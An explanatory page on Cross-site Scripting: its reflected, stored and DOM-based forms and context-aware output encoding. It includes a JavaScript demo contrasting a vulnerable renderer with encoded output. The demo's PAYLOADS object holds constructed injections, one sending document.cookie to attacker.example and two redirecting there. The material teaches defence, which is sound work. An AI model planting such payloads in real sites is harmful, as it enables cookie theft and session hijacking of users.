Cross-site Scripting (XSS) is an attack technique in which attacker-supplied code is echoed back into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually HTML/JavaScript, but may also be VBScript, ActiveX, Java, Flash, or any other browser-supported technology (several of these, notably Flash, ActiveX and VBScript, are no longer supported by current mainstream browsers, but embedded and legacy clients may still honor them).

When an attacker gets a user's browser to execute his or her code, that code runs within the security context (or zone) of the hosting web site. With this level of privilege it can read, modify and transmit any sensitive data that the browser holds for that site. A Cross-site Scripted user could have his or her account hijacked (cookie theft), be redirected to another location, or be shown fraudulent content that appears to come from the web site being visited. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications that use browser object instances which load content from the file system may execute code under the local machine zone, allowing for compromise of the system itself.

There are three types of Cross-site Scripting attacks: non-persistent (reflected), persistent (stored) and DOM-based.

Non-persistent and DOM-based attacks require the user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form which, when posted to the vulnerable site, mounts the attack. A malicious form is typically used when the vulnerable resource only accepts HTTP POST requests; in that case the form can be submitted automatically, without the victim's knowledge. Upon clicking the malicious link or submitting the malicious form, the XSS payload is echoed back, interpreted by the user's browser and executed. Another technique for sending almost arbitrary requests (GET and POST) is an embedded client such as Adobe Flash. In the DOM-based variant the payload is consumed by the page's own client-side script (for example, read from the URL fragment and written into the document), so it may never reach the server at all and server-side output encoding alone will not catch it.

Persistent attacks occur when the malicious code is submitted to a web site where it is stored for a period of time. Favorite targets include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site or link (e.g. an attacker site or a malicious link sent via email); simply viewing the web page that contains the stored code is enough.

Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or that provides constructs which make it easier to avoid. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. The right encoding depends on where the data lands: the HTML body, a quoted attribute value, a URL parameter and a JavaScript string literal each need a different scheme, and encoding for one context does not protect the others.
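The context-dependent encoding described above, as an added example written for this page; it is not code from the original post nor from the Anti-XSS, ESAPI or Wicket libraries it names. It assumes a hypothetical "search results" page that reflects the query into an HTML heading, an attribute value, a link and a script block at the same time, and uses constructed payloads with the placeholder host attacker.example to show each context being broken out of and then neutralized.

```javascript
// Added example (not from the original post or any named library).
// Context-aware output encoding in plain JavaScript (Node or browser).
// Every non-alphanumeric character is encoded, as the post recommends,
// so attacker-supplied data cannot close a tag, attribute or string.

// HTML body and quoted-attribute context: numeric character references.
// The /u flag makes the class match whole code points, so an astral
// character (emoji etc.) becomes one &#NNNNN; rather than two surrogates.
function encodeForHtml(input) {
  return String(input).replace(/[^A-Za-z0-9]/gu, (ch) => `&#${ch.codePointAt(0)};`);
}

// JavaScript string-literal context: \uXXXX / \u{XXXXX} escapes. This keeps
// quotes and "</script>" from terminating the literal or the script block.
function encodeForJsString(input) {
  return String(input).replace(/[^A-Za-z0-9]/gu, (ch) => {
    const cp = ch.codePointAt(0);
    return cp > 0xffff
      ? `\\u{${cp.toString(16)}}`
      : `\\u${cp.toString(16).padStart(4, "0")}`;
  });
}

// URL query-parameter context: percent-encoding via the standard API.
function encodeForUrlParam(input) {
  return encodeURIComponent(String(input));
}

const SAFE_ENCODERS = { html: encodeForHtml, js: encodeForJsString, url: encodeForUrlParam };
const IDENTITY = { html: String, js: String, url: String }; // reproduces the bug

// Hypothetical reflected page: the query lands in four contexts at once,
// which is the multiple-encodings situation the post warns about.
function renderSearchPage(query, enc = SAFE_ENCODERS) {
  return [
    "<!doctype html><html><body>",
    `<h1>Results for ${enc.html(query)}</h1>`,
    `<input type="text" name="q" value="${enc.html(query)}">`,
    `<a href="/search?q=${enc.url(query)}&page=2">next</a>`,
    `<script>var lastQuery = "${enc.js(query)}";</script>`,
    "</body></html>",
  ].join("\n");
}

// Constructed payloads mirroring the post's cookie-theft and redirect outcomes;
// attacker.example is a placeholder host.
const PAYLOADS = {
  body: "<script>location='http://attacker.example/?c='+document.cookie</script>",
  attribute: '" autofocus onfocus="location=\'http://attacker.example\'',
  jsString: '";location="http://attacker.example";//',
};

// Crude check for the markers a browser would interpret as the payload.
function looksExploitable(html) {
  return /<script>location=/.test(html)
    || /autofocus onfocus=/.test(html)
    || /";location=/.test(html);
}

function vulnerableRender(payload) {
  return renderSearchPage(payload, IDENTITY);
}

function safeRender(payload) {
  return renderSearchPage(payload, SAFE_ENCODERS);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [name, p] of Object.entries(PAYLOADS)) {
    console.log(name, "vulnerable:", looksExploitable(vulnerableRender(p)),
      "encoded:", looksExploitable(safeRender(p)));
  }
  console.log(safeRender(PAYLOADS.body));
}
```

Encoding every non-alphanumeric character is deliberately conservative; the libraries named above encode only the characters that are significant in each context, which is more readable but requires that the context be identified correctly. Either way the encoder must be chosen per output location, and none of this covers the DOM-based case, where the fix is on the client (write untrusted data with textContent or a similar safe sink rather than innerHTML).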